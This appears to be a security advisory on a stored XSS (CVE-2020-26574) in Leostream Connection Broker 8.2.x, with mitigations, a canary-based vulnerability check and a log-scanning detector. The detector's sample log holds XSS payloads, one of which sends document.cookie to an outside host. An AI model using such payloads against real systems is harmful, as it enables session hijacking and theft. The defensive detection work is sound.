CVE-2020-26574

9.6 CRITICAL

📋 TL;DR

CVE-2020-26574 is a stored cross-site scripting (XSS) vulnerability in Leostream Connection Broker 8.2.x. An unauthenticated attacker plants JavaScript by sending a crafted User-Agent header to webquery.pl; the value is stored and later rendered without encoding in the administrator interface. Script executing in an administrator's browser session can then be chained to remote code execution as root on the broker host. The attacker needs no credentials and no interaction beyond an administrator opening the page that displays the stored value. Only versions the vendor no longer supports are affected, so there is no patch for 8.2.x; the fix is an upgrade to a supported release.

💻 Affected Systems

Products:
  • Leostream Connection Broker
Versions: 8.2.x series
Operating Systems: All platforms running Leostream Connection Broker
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects product versions the vendor no longer supports, per its product lifecycle documentation; no fix will be issued for those versions.

📦 What is this software?

Leostream Connection Broker is a management server for remote desktop and VDI deployments: it authenticates users, assigns them desktops or sessions from resource pools, and brokers the client connection. It is administered through a web console on the broker host. That console is what renders stored client information, including the User-Agent value, to the administrator, which is why a header sent by an anonymous client ends up as script running in an admin session.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with root-level remote code execution, allowing attacker to install backdoors, steal data, or pivot to other systems.

🟠

Likely Case

Administrative account compromise leading to session hijacking, data theft, and potential privilege escalation within the Leostream environment.

🟢

If Mitigated

Either the injected script does not run at all (output encoding or a CSP without 'unsafe-inline' is in place), or it runs in the administrator's browser but cannot reach the attacker (egress filtering on the broker and the admin network), leaving a neutralised or contained XSS rather than root-level code execution.

🌐 Internet-Facing: HIGH - Unauthenticated exploitation possible via web interface, making internet-facing instances particularly vulnerable.
🏢 Internal Only: MEDIUM - Still exploitable by internal attackers or compromised internal systems, but attack surface is reduced.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public write-ups describe the XSS-to-RCE chain. The injection step needs no credentials, but payload execution waits until an administrator opens the page that renders the stored User-Agent, so exploitation is asynchronous and depends on admin activity. Low complexity: a single HTTP request with a crafted header plants the payload.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: N/A (the 8.2.x branch is unsupported; no fix will be issued for it)

Vendor Advisory: https://www.leostream.com/resources/product-lifecycle/

Restart Required: Not applicable (no patch exists)

Instructions:

There is no patch for 8.2.x. Upgrade to a release the vendor currently supports; until then apply the workarounds below and treat the broker as exposed to unauthenticated injection. Because this is a stored XSS, payloads already planted remain in the broker's data until the records are removed, so review stored User-Agent and client records after remediation rather than assuming the upgrade cleared them.

🔧 Temporary Workarounds

Input Validation for User-Agent Headers

Applies to: all platforms

Sanitize the User-Agent value that webquery.pl stores, and encode it again wherever it is written into HTML. HTML-entity-encode the characters < > & " ' before the value is stored or rendered (in Perl, HTML::Entities::encode_entities with the unsafe-character set given explicitly, since its default set does not cover the apostrophe). Encoding at render time is what neutralises payloads that are already stored; encoding at input time alone leaves existing records exploitable.

Caveat: editing the vendor's webquery.pl is an unsupported local change and will be overwritten by an upgrade; record it so it is not silently lost.

Content Security Policy

Applies to: all platforms

Send a Content-Security-Policy header on responses from the administrator interface, for example:

Content-Security-Policy: default-src 'self'

Without 'unsafe-inline' this blocks inline <script> blocks and inline event handlers (onerror=, onload=), which is how a header-injected payload executes. It also blocks any inline scripts the console itself relies on, so roll it out as Content-Security-Policy-Report-Only first and inspect the violation reports before enforcing. CSP reduces impact in the admin's browser; it does not stop the injection from being stored.

🧯 If You Can't Patch

  • Isolate Leostream instances behind network segmentation with strict firewall rules; expose webquery.pl and the administrator console only to the networks that need them, never directly to the internet
  • Implement web application firewall (WAF) rules for XSS, and make sure they inspect the User-Agent header rather than only the URL and body, since the header is the injection vector here
  • Apply egress filtering on the broker host and the administrator network so a fired payload cannot call back or exfiltrate, and restrict the workstations from which administrators open the console

🔍 How to Verify

Check if Vulnerable:

Check the Leostream version; any 8.2.x release is affected. To confirm the behaviour, send a request to webquery.pl with a harmless marker in the User-Agent header (a unique string containing the characters < > " ' &, not a script), then open the administrator page that displays client User-Agent values and view its source: if those characters appear unencoded, the instance is vulnerable. Do not use a real script payload on production; whatever you plant executes in the browser of the next administrator who views it.

Check Version:

Read the version from the administrator interface or the broker's configuration files, and compare it with the vendor's product lifecycle page to confirm whether it is an unsupported release.

Verify Fix Applied:

Repeat the marker test after the change: the marker's metacharacters must appear as HTML entities (&lt; &quot; and so on) in the page source, and no script must execute in the browser. Also check records stored before the fix, since encoding only newly received values leaves earlier payloads live.
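The encoding workaround and the marker test above, worked through as an added example in Python (this is not Leostream's code and not from the advisory; the render_* functions stand in for the flaw class of building HTML from the stored header, the exact markup of webquery.pl and the admin page is unknown, and the probe URL is a parameter you supply):

```python
"""Added example (not Leostream's code, not from the advisory): output-encoding
the stored User-Agent, and a canary-based check of whether an instance renders
that header unencoded. Assumptions: the render_* functions mimic the flaw class
(an HTML row built from the stored header); the real page markup is unknown, and
the webquery.pl URL passed to send_canary() is whatever the deployment uses."""
import html
import re
import secrets
import urllib.request

# Every character an HTML encoder must neutralise, in the order the canary carries them.
META = '<"\'>&'
_ENTITY = re.compile(r'&(?:#x[0-9A-Fa-f]+|#\d+|[A-Za-z]+);')


def make_canary(tag="LSUA"):
    """Unique, harmless marker: tag + random token, the metacharacters, then the
    token again so the region to inspect is delimited on both sides. It contains
    no script, so it cannot harm the administrator who views it."""
    token = secrets.token_hex(4)
    return f"{tag}{token}{META}{token}"


def render_row_vulnerable(ua):
    """Flaw class: the stored header is concatenated straight into the page."""
    return f'<tr><td class="ua">{ua}</td></tr>'


def render_row_safe(ua):
    """Hardened: HTML-entity-encode at output time. The Perl equivalent inside
    webquery.pl is HTML::Entities::encode_entities($ua, q{<>&"'}); pass the
    character set explicitly because the default set omits the apostrophe."""
    return f'<tr><td class="ua">{html.escape(ua, quote=True)}</td></tr>'


def classify(page_html, canary):
    """Return (verdict, raw_chars) for the page an administrator would see.
    Looks at the text between the canary's two tokens: metacharacters surviving
    after well-formed entities are removed were rendered raw, which means the
    field is injectable (quotes alone suffice for attribute-context XSS)."""
    prefix, suffix = canary.split(META, 1)
    start = page_html.find(prefix)
    if start < 0:
        return "absent", []
    start += len(prefix)
    end = page_html.find(suffix, start)
    if end < 0:
        return "absent", []
    region = page_html[start:end]
    leftover = _ENTITY.sub("", region)
    raw = [c for c in META if c in leftover]
    if raw:
        return "unescaped", raw
    return ("escaped" if _ENTITY.search(region) else "stripped"), []


def send_canary(url, canary, timeout=10):
    """Plant the canary via the User-Agent header. `url` is the webquery.pl
    endpoint of the instance under test (path assumed). Fetching the admin page
    afterwards needs an admin session and is left to the operator."""
    req = urllib.request.Request(url, headers={"User-Agent": canary})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    c = make_canary()
    print("vulnerable render ->", classify(render_row_vulnerable(c), c))
    print("hardened render   ->", classify(render_row_safe(c), c))
```

Run it stand-alone to see the vulnerable and hardened renderings classified. Against a real instance, call send_canary() with the webquery.pl URL, then fetch the administrator page that lists client User-Agent values with an admin session and pass its HTML to classify(); a verdict of "unescaped" with any character listed means the field is still injectable, and "escaped" is what the fix must produce.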

📡 Detection & Monitoring

Log Indicators:

  • User-Agent strings in web server logs containing HTML tags, quotes, event-handler attributes (onerror=, onload=) or percent-encoded angle brackets (%3C, %3E)
  • Repeated requests to webquery.pl from one source with varying User-Agent values, the pattern of an attacker iterating on a payload

Network Indicators:

  • HTTP requests carrying JavaScript or HTML markup in the User-Agent header
  • Unexpected outbound connections from the broker host (the post-exploitation stage runs there as root) or from administrator workstations to unknown hosts right after the console is used (payload callbacks)

SIEM Query:

source="leostream_logs" AND (User-Agent CONTAINS "<script>" OR User-Agent CONTAINS "javascript:")

This matches only the literal, case-sensitive strings "<script>" and "javascript:". Extend it to event-handler attributes (onerror=, onload=), other tags (<img, <svg, <iframe) and URL-encoded forms (%3Cscript, %3Csvg), match case-insensitively, and filter on requests to webquery.pl to keep the result set small.
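The SIEM query above, as an added example of the same detection logic run over constructed access-log lines in Python (not from the advisory or from Leostream; it assumes Apache/NCSA combined log format and the /webquery.pl path, and covers the encoded and event-handler cases a two-substring query misses):

```python
"""Added example (not from the advisory, not Leostream tooling): hunting for XSS
payloads in the User-Agent field of web server access logs. The log lines are
constructed here in Apache/NCSA combined format; the broker's real log format and
the /webquery.pl path are assumptions and must be adapted to the deployment."""
import html
import re
from urllib.parse import unquote

# Apache/NCSA combined log format; quoted fields may contain \" and \\ escapes.
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

# Broader than two literal substrings: tags, inline event handlers,
# javascript:/data: URLs and the JS sinks that show up in probes.
XSS_PATTERNS = [re.compile(p, re.I) for p in (
    r'<\s*/?\s*(script|img|svg|iframe|object|embed|body|style|link|meta)\b',
    r'\bon[a-z]+\s*=',                       # onerror=, onload=, onmouseover=
    r'javascript\s*:',
    r'\bdata\s*:[^,]*base64',
    r'\b(alert|prompt|confirm|eval|fetch|XMLHttpRequest)\s*\(|document\.cookie',
)]


def normalise(ua):
    """Undo the layers attackers use to dodge substring matching: the log writer's
    backslash escapes, percent-encoding (twice, for double-encoded probes) and
    HTML entities. Matching then runs on the form a browser would see."""
    s = re.sub(r'\\(.)', r'\1', ua)
    for _ in range(2):
        s = unquote(s)
    return html.unescape(s)


def scan_line(line):
    """Return a finding dict for a suspicious line, or None."""
    m = _COMBINED.match(line)
    if not m:
        return None
    ua = normalise(m.group('ua'))
    hits = [p.pattern for p in XSS_PATTERNS if p.search(ua)]
    if not hits:
        return None
    return {
        'ip': m.group('ip'),
        'ts': m.group('ts'),
        'request': m.group('req'),
        'ua': ua,
        'patterns': hits,
        'webquery': 'webquery.pl' in m.group('req'),   # the known vector
    }


def scan(lines):
    return [f for f in map(scan_line, lines) if f]


# Constructed sample: one legitimate browser, three probes against webquery.pl
# (plain, with log-escaped quotes, percent-encoded) and an unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Oct/2020:14:03:11 +0000] "GET /webquery.pl HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"',
    '198.51.100.7 - - [12/Oct/2020:14:03:40 +0000] "GET /webquery.pl HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 <script>fetch(\'http://203.0.113.9/?c=\'+document.cookie)</script>"',
    '198.51.100.7 - - [12/Oct/2020:14:04:02 +0000] "POST /webquery.pl HTTP/1.1" 200 98 "-" '
    '"<img src=x onerror=\\"alert(1)\\">"',
    '198.51.100.7 - - [12/Oct/2020:14:05:19 +0000] "GET /webquery.pl HTTP/1.1" 200 512 "-" '
    '"%3Csvg%2Fonload%3Dalert%281%29%3E"',
    '10.0.0.9 - - [12/Oct/2020:14:06:00 +0000] "GET /index.pl HTTP/1.1" 302 0 "-" "curl/7.68.0"',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f['ts'], f['ip'], f['request'], '->', f['ua'])
```

Feed real log lines to scan(); findings with webquery set are the known vector, and one source producing several of them with different User-Agent values is an attacker iterating on a payload. Normalising before matching is the point of the example: the third and fourth sample lines contain no literal "<script>" and would pass a query written only for that string.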

🔗 References

  • Leostream product lifecycle (vendor advisory): https://www.leostream.com/resources/product-lifecycle/
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2020-26574